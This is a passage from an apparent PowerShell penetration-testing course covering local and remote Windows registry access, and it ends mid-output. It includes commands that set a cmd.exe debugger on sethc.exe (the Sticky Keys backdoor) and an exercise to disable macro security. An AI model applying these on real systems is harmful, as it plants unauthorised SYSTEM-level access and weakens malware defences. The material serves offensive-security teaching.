```PowerShell PS C:\> Get-Item 'HKCU:\SOFTWARE\Microsoft\Internet Explorer\TypedURLs' Hive: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer Name Property ---- -------- TypedURLs url1 : https://www.google.com/ url2 : https://github.com/samratashok/nishang url3 : http://www.bing.com/search?q=nishang&FORM=IE8SRC url4 : http://go.microsoft.com/fwlink/p/?LinkId=255141 PS C:\> ``` - List all [```installed software```](https://social.technet.microsoft.com/Forums/windows/en-US/d913471a-d7fb-448d-869b-da9025dcc943/where-does-addremove-programs-get-its-information-from-in-the-registry?forum=w7itprogeneral) on a computer from Windows Registry ```PowerShell PS C:\> Get-ChildItem 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall' Hive: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall Name Property ---- -------- AddressBook Connection Manager SystemComponent : 1 DirectDrawEx Fontcore IE40 IE4Data IE5BAKEX IEData MobileOptionPack Mozilla Firefox 54.0.1 (x64 Comments : Mozilla Firefox 54.0.1 (x64 en-US) en-US) DisplayIcon : C:\Program Files\Mozilla Firefox\firefox.exe,0 DisplayName : Mozilla Firefox 54.0.1 (x64 en-US) DisplayVersion : 54.0.1 HelpLink : https://support.mozilla.org InstallLocation : C:\Program Files\Mozilla Firefox Publisher : Mozilla UninstallString : "C:\Program Files\Mozilla Firefox\uninstall\helper.exe" URLUpdateInfo : https://www.mozilla.org/firefox/54.0.1/releasenotes URLInfoAbout : https://www.mozilla.org NoModify : 1 NoRepair : 1 EstimatedSize : 103916 MozillaMaintenanceService DisplayName : Mozilla Maintenance Service UninstallString : "C:\Program Files (x86)\Mozilla Maintenance Service\uninstall.exe" DisplayIcon : C:\Program Files (x86)\Mozilla Maintenance Service\Uninstall.exe,0 DisplayVersion : 54.0.1 Publisher : Mozilla Comments : Mozilla Maintenance Service NoModify : 1 EstimatedSize : 278 Oracle VM VirtualBox Guest DisplayName : Oracle VM VirtualBox Guest Additions 5.1.22 Additions UninstallString : C:\Program Files\Oracle\VirtualBox Guest Additions\uninst.exe DisplayVersion : 5.1.22.0 URLInfoAbout : http://www.virtualbox.org Publisher : Oracle Corporation SchedulingAgent WIC NoRemove : 1 PS C:\> ``` ================================================ FILE: 37-Registry-and-Powershell-Part-2.md ================================================ #### 37. Registry and Powershell Part 2 - ```Get-PSProvider``` ```PowerShell PS C:\> Get-PSProvider Name Capabilities Drives ---- ------------ ------ Alias ShouldProcess {Alias} Environment ShouldProcess {Env} FileSystem Filter, ShouldProcess, Credentials {C, D} Function ShouldProcess {Function} Registry ShouldProcess, Transactions {HKLM, HKCU} Variable ShouldProcess {Variable} PS C:\> ``` - ```New-Item``` ```PowerShell PS C:\> New-Item -Path 'HKCU:\PFPT' Hive: HKEY_CURRENT_USER Name Property ---- -------- PFPT PS C:\> ``` ```PowerShell PS C:\> New-Item -Path 'HKCU:\PFPT\NewSubKey' Hive: HKEY_CURRENT_USER\PFPT Name Property ---- -------- NewSubKey PS C:\> ``` - ```New-ItemProperty``` ```PowerShell PS C:\> New-ItemProperty -Path 'HKCU:\PFPT' -Name Reg2 -PropertyType String -Value 2 Reg2 : 2 PSPath : Microsoft.PowerShell.Core\Registry::HKEY_CURRENT_USER\PFPT PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_CURRENT_USER PSChildName : PFPT PSDrive : HKCU PSProvider : Microsoft.PowerShell.Core\Registry PS C:\> ``` - ```Rename-Item``` ```PowerShell PS C:\> Rename-Item HKCU:\PFPT\NewSubKey -NewName RenamedSubKey ``` - ```Rename-Itemproperty``` ```PowerShell PS C:\> Rename-ItemProperty HKCU:\PFPT -Name Reg2 -NewName Reg3 ``` - ```Set-ItemProperty``` ```PowerShell PS C:\> Set-ItemProperty -Path HKCU:\PFPT -Name Reg3 -Value 45 ``` ![Image of Registry](images/15.jpeg) - Attach the ```Degugger``` to the ```Sticky Keys``` executable ```PowerShell PS C:\> New-Item 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe' Hive: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options Name Property ---- -------- sethc.exe PS C:\> ``` ```PowerShell PS C:\> New-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe' -Name Degugger -PropertyType String -Value cmd.exe Degugger : cmd.exe PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options PSChildName : sethc.exe PSDrive : HKLM PSProvider : Microsoft.PowerShell.Core\Registry PS C:\> ``` ###### Exercise - Write a script which: - Disables Macro Security by editing the Registry, if it is enabled. - Enables Macro Security, if it is not enabled ================================================ FILE: 38-Registry-and-Powershell-Part-3.md ================================================ #### 38. Registry and Powershell Part 3 ###### Windows Registry on Remote Computer ###### Ways of access Registry on a remote computer - ```Enter-PSSession``` ```PowerShell PS C:\> Enter-PSSession -ComputerName JOHN-PC -Credential John-PC\John ``` ```PowerShell [JOHN-PC]: PS C:\Users\John\Documents> Get-Item 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion' Hive: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT SKC VC Name Property --- -- ---- -------- 80 20 CurrentVersion {CurrentVersion, CurrentBuild, SoftwareType, CurrentType...} [JOHN-PC]: PS C:\Users\John\Documents> ``` ```PowerShell [JOHN-PC]: PS C:\Users\John\Documents> Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion' PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT PSChildName : CurrentVersion PSDrive : HKLM PSProvider : Microsoft.PowerShell.Core\Registry CurrentVersion : 6.1 CurrentBuild : 7600 SoftwareType : System CurrentType : Multiprocessor Free InstallDate : 1499805246 RegisteredOrganization : RegisteredOwner : John SystemRoot : C:\Windows InstallationType : Client EditionID : Ultimate ProductName : Windows 7 Ultimate ProductId : 00426-OEM-8992662-00497 DigitalProductId : {164, 0, 0, 0...} DigitalProductId4 : {248, 4, 0, 0...} CurrentBuildNumber : 7600 BuildLab : 7600.win7_rtm.090713-1255 BuildLabEx : 7600.16385.x86fre.win7_rtm.090713-1255 BuildGUID : e331ce24-377a-47bd-86de-92ae1aa1ae65 CSDBuildNumber : 1 PathName : C:\Windows [JOHN-PC]: PS C:\Users\John\Documents> ``` ```PowerShell [JOHN-PC]: PS C:\Users\John\Documents> Get-ChildItem 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion' Hive: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion SKC VC Name Property --- -- ---- -------- 1 0 Accessibility {} 0 0 AdaptiveDisplayBrightness {} 1 1 AeDebug {UserDebuggerHotKey} 0 10 APITracing {LogFileDirectory, InstalledManifests, LogApiNamesOnly, LogApisRecursively...} 6 1 AppCompatFlags {ApphelpUIExe} 0 1 ASR {OfflineDriverInjectionExtension} 1 0 Audit {} 0 1 BootMgr {KB935509} 0 174 Compatibility {_3DPC, _BNOTES, _LNOTES, ACAD...} 0 1 Compatibility32 {winword} 3 0 Console {} 1 2 CorruptedFileRecovery {RunCount, TraceLevel} 0 3 DefaultProductKey {ProductId, DigitalProductId, DigitalProductId4} 0 3 DefaultProductKey2 {ProductId, DigitalProductId, DigitalProductId4} 4 1 DeviceDisplayObjects {DeviceStatusPropertyDescriptionList} 2 0 DiskDiagnostics {} 0 1 Drivers {timer} 0 2 drivers.desc {C:\Windows\System32\l3codeca.acm, wdmaud.drv} 0 20 Drivers32 {vidc.mrle, vidc.msvc, msacm.imaadpcm, msacm.msg711...} 0 0 EFS {} 0 0 EMDMgmt {} 0 3 Event Viewer {MicrosoftRedirectionProgram, MicrosoftRedirectionProgramCommandLineParameters, MicrosoftRedirectionURL} 0 1 Font Drivers {Adobe Type Manager} 0 2 Font Management {Metadata, Auto Deactivation Exclude} 0 1 FontDPI {LogPixels} 1 2 FontLink {FontLinkControl, FontLinkDefaultChar} 1 44 FontMapper {ARIAL, Batang, BatangChe, @Batang...} 0 244 Fonts {Arial (TrueType), Arial Italic (TrueType), Arial Bold (TrueType), Arial Bold Italic (TrueType)...} 0 32 FontSubstitutes {Arabic Transparent, Arabic Transparent Bold, Arabic Transparent,0, Arabic Transparent Bold,0...} 2 2 GRE_Initialize {DisableRemoteFontBootCache, LastBootTimeFontCacheState} 2 0 ICM {} 2 0 Image File Execution Options {} 5 0 IniFileMapping {} 1 0 InstalledFeatures {} 0 2 KnownFunctionTableDlls {C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscordacwks.dll, C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscordacwks.dll} 0 2 KnownManagedDebuggingDlls {C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscordacwks.dll, C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscordacwks.dll} 2 1 LanguagePack {OpenType} 0 4 MCI {AVIVideo, Sequencer, CDAudio, WaveAudio} 0 50 MCI Extensions {avi, cda, Mid, rmi...} 0 5 MCI32 {AVIVideo, CDAudio, Sequencer, WaveAudio...} 0 2 MiniDumpAuxiliaryDlls {C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll, C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll} 0 15 ModuleCompatibility {CWD, INSTBI01, INSTBI02, INSTBIN...} 1 0 MsiCorruptedFileRecovery {} 1 0 Multimedia {} 1 0 NetworkCards {} 5 2 NetworkList {(default), FirstNetwork} 0 0 NvCache {} 1 0 OpenGLDrivers {} 6 0 PeerDist {} 2 0 PeerNet {} 3 5 Perflib {Base Index, Version, Last Counter, Last Help...} 131 1 PerHwIdStorage {LastUpdateTime} 1 0 PolicyGuid {} 0 11 Ports {COM1:, COM2:, COM3:, COM4:...} 0 3 Prefetcher {BootFilesOptimized, LastDiskLayoutTime, LastDiskLayoutTimeString} 5 1 Print {DoNotInstallCompatibleDriverFromWindowsUpdate} 1 0 ProfileGuid {} 5 4 ProfileList {ProfilesDirectory, Default, Public, ProgramData} 1 0 ProfileLoader {} 8 6 ProfileNotification {Create, Delete, Migrate, Upgrade...} 0 1 related.desc {wave} 7 1 Schedule {DomainJoinDetected} 2 6 SeCEdit {SetupCompDebugLevel, DefaultTemplate, EnvironmentVariables, LastUsedDatabase...} 1 0 setup {} 5 7 SoftwareProtectionPlatform {VLActivationInterval, VLRenewalInterval, UserOperations, InactivityShutdownDelay...} 2 1 SPP {LastIndex} 2 5 Superfetch {ServiceFlags, ProcessorTime, PfPdData, MemMonitorState...} 16 25 Svchost {RPCSS, defragsvc, LocalSystemNetworkRestricted, LocalService...} 3 3 SystemRestore {RPSessionInterval, FirstRun, LastIndex} 1 0 Terminal Server {} 91 1 Time Zones {TzVersion} 3 0 Tracing {} 0 1 Userinstallable.drivers {wave} 0 0 WbemPerf {} 0 14 Windows {IconServiceLib, DdeSendTimeout, DesktopHeapLogging, GDIProcessHandleQuota...} 2 21 Winlogon {ReportBootOk, Shell, PreCreateKnownFolders, Userinit...} 1 22 Winsat {MOOBE, LastExitCode, LastExitCodeCantMsg, LastExitCodeWhyMsg...} 0 9 WinSATAPI {LastFormalAssessment, TaskErrorCount, IdleWinSATRunCount, FirstIdleRunTimeDate...} 6 0 WOW {} 1 9 WUDF {LogEnable, Logkd, LogFlags, LogLevel...} [JOHN-PC]: PS C:\Users\John\Documents> ``` - ```PowerShell Remoting``` ```PowerShell PS C:\> Invoke-Command -ScriptBlock {Get-Item HKLM:\SOFTWARE} -ComputerName JOHN-PC -Credential John-PC\John Hive: HKEY_LOCAL_MACHINE Name Property PSComputerName ---- -------- -------------- SOFTWARE JOHN-PC PS C:\> ``` - ```WMI``` ```PowerShell PS C:\> $RemoteReg = Get-WmiObject -List "StdRegProv" -ComputerName JOHN-PC -Credential John-PC\John ``` ```PowerShell PS C:\> $RemoteReg NameSpace: ROOT\cimv2 Name Methods Properties ---- ------- ---------- StdRegProv {CreateKey, Delet... {} PS C:\> ``` ```PowerShell PS C:\> $RemoteReg | Select-Object -ExpandProperty methods Name : CreateKey InParameters : System.Management.ManagementBaseObject OutParameters : System.Management.ManagementBaseObject Origin : StdRegProv Qualifiers : {implemented, static} Name : DeleteKey InParameters : System.Management.ManagementBaseObject OutParameters : System.Management.ManagementBaseObject Origin : StdRegProv Qualifiers : {implemented, static} Name : EnumKey InParameters : System.Management.ManagementBaseObject OutParameters : System.Management.ManagementBaseObject Origin : StdRegProv Qualifiers : {implemented, static} Name : EnumValues InParameters : System.Management.ManagementBaseObject OutParameters : System.Management.ManagementBaseObject Origin : StdRegProv Qualifiers : {implemented, static} Name : DeleteValue InParameters : System.Management.ManagementBaseObject OutParameters : System.Management.ManagementBaseObject Origin : StdRegProv Qualifiers : {implemented, static} Name : SetDWORDValue InParameters : System.Management.ManagementBaseObject OutParameters : System.Management.ManagementBaseObject Origin : StdRegProv Qualifiers : {implemented, static} Name : SetQWORDValue InParameters : System.Management.ManagementBaseObject OutParameters : System.Management.ManagementBaseObject Origin : StdRegProv Qualifiers : {implemented, static} Name : GetDWORDValue InParameters : System.Management.ManagementBaseObject OutParameters : System.Management.ManagementBaseObject Origin : StdRegProv Qualifiers : {implemented, static} Name : GetQWORDValue InParameters : System.Management.ManagementBaseObject OutParameters : System.Management.ManagementBaseObject Origin : StdRegProv Qualifiers : {implemented, static} Name : SetStringValue InParameters : System.Management.ManagementBaseObject OutParameters : System.Management.ManagementBaseObject Origin : StdRegProv Qualifiers : {implemented, static} Name : GetStringValue InParameters : System.Management.ManagementBaseObject OutParameters : System.Management.ManagementBaseObject Origin : StdRegProv Qualifiers : {implemented, static} Name : SetMultiStringValue InParameters : System.Management.ManagementBaseObject OutParameters : System.Management.ManagementBaseObject Origin : StdRegProv Qualifiers : {implemented, static} Name : GetMultiStringValue InParameters : System.Management.ManagementBaseObject OutParameters : System.Management.ManagementBaseObject Origin : StdRegProv Qualifiers : {implemented, static} Name : SetExpandedStringValue InParameters : System.Management.ManagementBaseObject OutParameters : System.Management.ManagementBaseObject Origin : StdRegProv Qualifiers : {implemented, static} Name : GetExpandedStringValue InParameters : System.Management.ManagementBaseObject OutParameters : System.Management.ManagementBaseObject Origin : StdRegProv Qualifiers : {implemented, static} Name : SetBinaryValue InParameters : System.Management.ManagementBaseObject OutParameters : System.Management.ManagementBaseObject Origin : StdRegProv Qualifiers : {implemented, static} Name : GetBinaryValue InParameters : System.Management.ManagementBaseObject OutParameters : System.Management.ManagementBaseObject Origin : StdRegProv Qualifiers : {implemented, static} Name : CheckAccess InParameters : System.Management.ManagementBaseObject OutParameters : System.Management.ManagementBaseObject Origin : StdRegProv Qualifiers : {implemented, static} Name : SetSecurityDescriptor InParameters : System.Management.ManagementBaseObject OutParameters : System.Management.ManagementBaseObject Origin : StdRegProv Qualifiers : {implemented, Privileges, static} Name : GetSecurityDescriptor InParameters : System.Management.ManagementBaseObject OutParameters : System.Management.ManagementBaseObject Origin : StdRegProv Qualifiers : {implemented, Privileges, static} PS C:\> ``` [Hive](https://github.com/darkoperator/Posh-SecMod/blob/master/Registry/Registry.ps1) | Value -----|----------- HKCR | 2147483648 HKCU | 2147483649 HKLM | 2147483650 HKUS | 2147483651 HKCC | 2147483653 ```PowerShell PS C:\> $RemoteReg.GetStringValue(2147483650, "Software\Microsoft\Windows NT\CurrentVersion", "ProductName") __GENUS : 2 __CLASS : __PARAMETERS __SUPERCLASS : __DYNASTY : __PARAMETERS __RELPATH : __PROPERTY_COUNT : 2 __DERIVATION : {} __SERVER : __NAMESPACE : __PATH : ReturnValue : 0 sValue : Windows 7 Ultimate PSComputerName : PS C:\> ``` - ```.Net``` - ```[Microsoft.Win32.RegistryKey]``` - [Can’t pass alternate credentials](http://psremoteregistry.codeplex.com/) ```PowerShell PS C:\> [Microsoft.Win32.RegistryKey].GetMethods() Name : Close DeclaringType : Microsoft.Win32.RegistryKey ReflectedType : Microsoft.Win32.RegistryKey MemberType : Method MetadataToken : 100663541 Module : CommonLanguageRuntimeLibrary IsSecurityCritical : False IsSecuritySafeCritical : False IsSecurityTransparent : True MethodHandle : System.RuntimeMethodHandle Attributes : PrivateScope, Public, HideBySig CallingConvention : Standard, HasThis ReturnType : System.Void ReturnTypeCustomAttributes : Void ReturnParameter : Void IsGenericMethod : False IsGenericMethodDefinition : False ContainsGenericParameters : False MethodImplementationFlags : IL IsPublic : True IsPrivate : False IsFamily : False IsAssembly : False IsFamilyAndAssembly : False IsFamilyOrAssembly : False IsStatic : False IsFinal : False IsVirtual : False IsHideBySig : True IsAbstract : False IsSpecialName : False IsConstructor : False CustomAttributes : {} Name : Flush DeclaringType : Microsoft.Win32.RegistryKey ReflectedType : Microsoft.Win32.RegistryKey MemberType : Method MetadataToken : 100663543 Module : CommonLanguageRuntimeLibrary IsSecurityCritical : True IsSecuritySafeCritical : True IsSecurityTransparent : False MethodHandle : System.RuntimeMethodHandle Attributes : PrivateScope, Public, HideBySig CallingConvention : Standard, HasThis ReturnType : System.Void ReturnTypeCustomAttributes : Void ReturnParameter : Void IsGenericMethod : False IsGenericMethodDefinition : False ContainsGenericParameters : False MethodImplementationFlags : IL IsPublic : True IsPrivate : False IsFamily : False IsAssembly : False IsFamilyAndAssembly : False IsFamilyOrAssembly : False IsStatic : False IsFinal : False IsVirtual : False IsHideBySig : True IsAbstract : False IsSpecialName : False IsConstructor : False CustomAttributes : {[System.Security.SecuritySafeCriticalAttribute()]} Name : Dispose DeclaringType : Microsoft.Win32.RegistryKey ReflectedType : Microsoft.Win32.RegistryKey MemberType : Method MetadataToken : 100663544 Module : CommonLanguageRuntimeLibrary IsSecurityCritical : False IsSecuritySafeCritical : False IsSecurityTransparent : True MethodHandle : System.RuntimeMethodHandle Attributes : PrivateScope, Public, Final, Virtual, HideBySig, VtableLayoutMask CallingConvention : Standard, HasThis ReturnType : System.Void ReturnTypeCustomAttributes : Void ReturnParameter : Void IsGenericMethod : False IsGenericMethodDefinition : False ContainsGenericParameters : False MethodImplementationFlags : IL IsPublic : True IsPrivate : False IsFamily : False IsAssembly : False IsFamilyAndAssembly : False IsFamilyOrAssembly : False IsStatic : False IsFinal : True IsVirtual : True IsHideBySig : True IsAbstract : False IsSpecialName : False IsConstructor : False CustomAttributes : {} Name : CreateSubKey DeclaringType : Microsoft.Win32.RegistryKey ReflectedType : Microsoft.Win32.RegistryKey MemberType : Method MetadataToken : 100663545 Module : CommonLanguageRuntimeLibrary IsSecurityCritical : False IsSecuritySafeCritical : False IsSecurityTransparent : True MethodHandle : System.RuntimeMethodHandle Attributes : PrivateScope, Public, HideBySig CallingConvention : Standard, HasThis ReturnType : Microsoft.Win32.RegistryKey ReturnTypeCustomAttributes : Microsoft.Win32.RegistryKey ReturnParameter : Microsoft.Win32.RegistryKey IsGenericMethod : False IsGenericMethodDefinition : False ContainsGenericParameters : False MethodImplementationFlags : IL IsPublic : True IsPrivate : False IsFamily : False IsAssembly : False IsFamilyAndAssembly : False IsFamilyOrAssembly : False IsStatic : False IsFinal : False IsVirtual : False IsHideBySig : True IsAbstract : False IsSpecialName : False IsConstructor : False CustomAttributes : {} Name : CreateSubKey DeclaringType : Microsoft.Win32.RegistryKey ReflectedType : Microsoft.Win32.RegistryKey MemberType : Method MetadataToken : 100663546 Module : CommonLanguageRuntimeLibrary IsSecurityCritical : False IsSecuritySafeCritical : False IsSecurityTransparent : True MethodHandle : System.RuntimeMethodHandle Attributes : PrivateScope, Public, HideBySig CallingConvention : Standard, HasThis ReturnType : Microsoft.Win32.RegistryKey ReturnTypeCustomAttributes : Microsoft.Win32.RegistryKey ReturnParameter : Microsoft.Win32.RegistryKey IsGenericMethod : False IsGenericMethodDefinition : False ContainsGenericParameters : False MethodImplementationFlags : IL IsPublic : True IsPrivate : False IsFamily : False IsAssembly : False IsFamilyAndAssembly : False IsFamilyOrAssembly : False IsStatic : False IsFinal : False IsVirtual : False IsHideBySig : True IsAbstract : False IsSpecialName : False IsConstructor : False CustomAttributes : {[System.Runtime.InteropServices.ComVisibleAttribute((Boolean)False)]} Name : CreateSubKey DeclaringType : Microsoft.Win32.RegistryKey ReflectedType : Microsoft.Win32.RegistryKey MemberType : Method MetadataToken : 100663547 Module : CommonLanguageRuntimeLibrary IsSecurityCritical : False IsSecuritySafeCritical : False IsSecurityTransparent : True MethodHandle : System.RuntimeMethodHandle Attributes : PrivateScope, Public, HideBySig CallingConvention : Standard, HasThis ReturnType : Microsoft.Win32.RegistryKey ReturnTypeCustomAttributes : Microsoft.Win32.RegistryKey ReturnParameter : Microsoft.Win32.RegistryKey IsGenericMethod : False IsGenericMethodDefinition : False ContainsGenericParameters : False MethodImplementationFlags : IL IsPublic : True IsPrivate : False IsFamily : False IsAssembly : False IsFamilyAndAssembly : False IsFamilyOrAssembly : False IsStatic : False IsFinal : False IsVirtual : False IsHideBySig : True IsAbstract : False IsSpecialName : False IsConstructor : False CustomAttributes : {[System.Runtime.InteropServices.ComVisibleAttribute((Boolean)False)]} Name : CreateSubKey DeclaringType : Microsoft.Win32.RegistryKey ReflectedType : Microsoft.Win32.RegistryKey MemberType : Method MetadataToken : 100663548 Module : CommonLanguageRuntimeLibrary IsSecurityCritical : False IsSecuritySafeCritical : False IsSecurityTransparent : True MethodHandle : System.RuntimeMethodHandle Attributes : PrivateScope, Public, HideBySig CallingConvention : Standard, HasThis ReturnType : Microsoft.Win32.RegistryKey ReturnTypeCustomAttributes : Microsoft.Win32.RegistryKey ReturnParameter : Microsoft.Win32.RegistryKey IsGenericMethod : False IsGenericMethodDefinition : False ContainsGenericParameters : False MethodImplementationFlags : IL IsPublic : True IsPrivate : False IsFamily : False IsAssembly : False IsFamilyAndAssembly : False IsFamilyOrAssembly : False IsStatic : False IsFinal : False IsVirtual : False IsHideBySig : True IsAbstract : False IsSpecialName : False IsConstructor : False CustomAttributes : {[System.Runtime.InteropServices.ComVisibleAttribute((Boolean)False)]} Name : CreateSubKey DeclaringType : Microsoft.Win32.RegistryKey ReflectedType : Microsoft.Win32.RegistryKey MemberType : Method MetadataToken : 100663549 Module : CommonLanguageRuntimeLibrary IsSecurityCritical : False IsSecuritySafeCritical : False IsSecurityTransparent : True MethodHandle : System.RuntimeMethodHandle Attributes : PrivateScope, Public, HideBySig CallingConvention : Standard, HasThis ReturnType : Microsoft.Win32.RegistryKey ReturnTypeCustomAttributes : Microsoft.Win32.RegistryKey ReturnParameter : Microsoft.Win32.RegistryKey IsGenericMethod : False IsGenericMethodDefinition : False ContainsGenericParameters : False MethodImplementationFlags : IL IsPublic : True IsPrivate : False IsFamily : False IsAssembly : False IsFamilyAndAssembly : False IsFamilyOrAssembly : False IsStatic : False IsFinal : False IsVirtual : False IsHideBySig : True IsAbstract : False IsSpecialName : False IsConstructor : False CustomAttributes : {[System.Runtime.InteropServices.ComVisibleAttribute((Boolean)False)]} Name : CreateSubKey DeclaringType : Microsoft.Win32.RegistryKey ReflectedType : Microsoft.Win32.RegistryKey MemberType : Method MetadataToken : 100663550 Module : CommonLanguageRuntimeLibrary IsSecurityCritical : False IsSecuritySafeCritical : False IsSecurityTransparent : True MethodHandle : System.RuntimeMethodHandle Attributes : PrivateScope, Public, HideBySig CallingConvention : Standard, HasThis ReturnType : Microsoft.Win32.RegistryKey ReturnTypeCustomAttributes : Microsoft.Win32.RegistryKey ReturnParameter : Microsoft.Win32.RegistryKey IsGenericMethod : False IsGenericMethodDefinition : False ContainsGenericParameters : False MethodImplementationFlags : IL IsPublic : True IsPrivate : False IsFamily : False IsAssembly : False IsFamilyAndAssembly : False IsFamilyOrAssembly : False IsStatic : False IsFinal : False IsVirtual : False IsHideBySig : True IsAbstract : False IsSpecialName : False IsConstructor : False CustomAttributes : {[System.Runtime.InteropServices.ComVisibleAttribute((Boolean)False)]} Name : CreateSubKey DeclaringType : Microsoft.Win32.RegistryKey ReflectedType : Microsoft.Win32.RegistryKey MemberType : Method MetadataToken : 100663551 Module : CommonLanguageRuntimeLibrary IsSecurityCritical : False IsSecuritySafeCritical : False IsSecurityTransparent : True MethodHandle : System.RuntimeMethodHandle Attributes : PrivateScope, Public, HideBySig CallingConvention : Standard, HasThis ReturnType : Microsoft.Win32.RegistryKey ReturnTypeCustomAttributes : Microsoft.Win32.RegistryKey ReturnParameter : Microsoft.Win32.RegistryKey IsGenericMethod : False IsGenericMethodDefinition : False ContainsGenericParameters : False MethodImplementationFlags : IL IsPublic : True IsPrivate : False IsFamily : False IsAssembly : False IsFamilyAndAssembly : False IsFamilyOrAssembly : False IsStatic : False IsFinal : False IsVirtual : False IsHideBySig : True IsAbstract : False IsSpecialName : False IsConstructor : False CustomAttributes : {[System.Runtime.InteropServices.ComVisibleAttribute((Boolean)False)]} Name : DeleteSubKey DeclaringType : Microsoft.Win32.RegistryKey ReflectedType : Microsoft.Win32.RegistryKey MemberType : Method MetadataToken : 100663553 Module : CommonLanguageRuntimeLibrary IsSecurityCritical : False IsSecuritySafeCritical : False IsSecurityTransparent : True MethodHandle : System.RuntimeMethodHandle Attributes : PrivateScope, Public, HideBySig CallingConvention : Standard, HasThis ReturnType : System.Void ReturnTypeCustomAttributes : Void ReturnParameter : Void IsGenericMethod : False IsGenericMethodDefinition : False ContainsGenericParameters : False MethodImplementationFlags : IL IsPublic : True IsPrivate : False IsFamily : False IsAssembly : False IsFamilyAndAssembly : False IsFamilyOrAssembly : False IsStatic : False IsFinal : False IsVirtual : False IsHideBySig : True IsAbstract : False IsSpecialName : False IsConstructor : False CustomAttributes : {} Name : DeleteSubKey DeclaringType : Microsoft.Win32.RegistryKey ReflectedType : Microsoft.Win32.RegistryKey MemberType : Method MetadataToken : 100663554 Module : CommonLanguageRuntimeLibrary IsSecurityCritical : True IsSecuritySafeCritical : True IsSecurityTransparent : False MethodHandle : System.RuntimeMethodHandle Attributes : PrivateScope, Public, HideBySig CallingConvention : Standard, HasThis ReturnType : System.Void ReturnTypeCustomAttributes : Void ReturnParameter : Void IsGenericMethod : False IsGenericMethodDefinition : False ContainsGenericParameters : False MethodImplementationFlags : IL IsPublic : True IsPrivate : False IsFamily : False IsAssembly : False IsFamilyAndAssembly : False IsFamilyOrAssembly : False IsStatic : False IsFinal : False IsVirtual : False IsHideBySig : True IsAbstract : False IsSpecialName : False IsConstructor : False CustomAttributes : {[System.Security.SecuritySafeCriticalAttribute()]} Name : DeleteSubKeyTree DeclaringType : Microsoft.Win32.RegistryKey ReflectedType : Microsoft.Win32.RegistryKey MemberType : Method MetadataToken : 100663555 Module : CommonLanguageRuntimeLibrary IsSecurityCritical : False IsSecuritySafeCritical : False IsSecurityTransparent : True MethodHandle : System.RuntimeMethodHandle Attributes : PrivateScope, Public, HideBySig CallingConvention : Standard, HasThis ReturnType : System.Void ReturnTypeCustomAttributes : Void ReturnParameter : Void IsGenericMethod : False IsGenericMethodDefinition : False ContainsGenericParameters : False MethodImplementationFlags : IL IsPublic : True IsPrivate : False IsFamily : False IsAssembly : False IsFamilyAndAssembly : False IsFamilyOrAssembly : False IsStatic : False IsFinal : False IsVirtual : False IsHideBySig : True IsAbstract : False IsSpecialName : False IsConstructor : False CustomAttributes : {} Name : DeleteSubKeyTree DeclaringType : Microsoft.Win32.RegistryKey ReflectedType : Microsoft.Win32.RegistryKey MemberType : Method MetadataToken : 100663556 Module : CommonLanguageRuntimeLibrary IsSecurityCritical : True IsSecuritySafeCritical : True IsSecurityTransparent : False MethodHandle : System.RuntimeMethodHandle Attributes : PrivateScope, Public, HideBySig CallingConvention : Standard, HasThis ReturnType : System.Void ReturnTypeCustomAttributes : Void ReturnParameter : Void IsGenericMethod : False IsGenericMethodDefinition : False ContainsGenericParameters : False MethodImplementationFlags : IL IsPublic : True IsPrivate : False IsFamily : False IsAssembly : False IsFamilyAndAssembly : False IsFamilyOrAssembly : False IsStatic : False IsFinal : False IsVirtual : False IsHideBySig : True IsAbstract : False IsSpecialName : False IsConstructor : False CustomAttributes : {[System.Security.SecuritySafeCriticalAttribute()], [System.Runtime.InteropServices.ComVisibleAttribute((Boolean)False)]} Name : DeleteValue DeclaringType : Microsoft.Win32.RegistryKey ReflectedType : Microsoft.Win32.RegistryKey MemberType : Method MetadataToken : 100663558 Module : CommonLanguageRuntimeLibrary IsSecurityCritical : False IsSecuritySafeCritical : False IsSecurityTransparent : True MethodHandle : System.RuntimeMethodHandle Attributes : PrivateScope, Public, HideBySig CallingConvention : Standard, HasThis ReturnType : System.Void ReturnTypeCustomAttributes : Void ReturnParameter : Void IsGenericMethod : False IsGenericMethodDefinition : False ContainsGenericParameters : False MethodImplementationFlags : IL IsPublic : True IsPrivate : False IsFamily : False IsAssembly : False IsFamilyAndAssembly : False IsFamilyOrAssembly : False IsStatic : False IsFinal : False IsVirtual : False IsHideBySig : True IsAbstract : False IsSpecialName : False IsConstructor : False CustomAttributes : {} Name : DeleteValue DeclaringType : Microsoft.Win32.RegistryKey ReflectedType : Microsoft.Win32.RegistryKey MemberType : Method MetadataToken : 100663559 Module : CommonLanguageRuntimeLibrary IsSecurityCritical : True IsSecuritySafeCritical : True IsSecurityTransparent : False MethodHandle : System.RuntimeMethodHandle Attributes : PrivateScope, Public, HideBySig CallingConvention : Standard, HasThis ReturnType : System.Void ReturnTypeCustomAttributes : 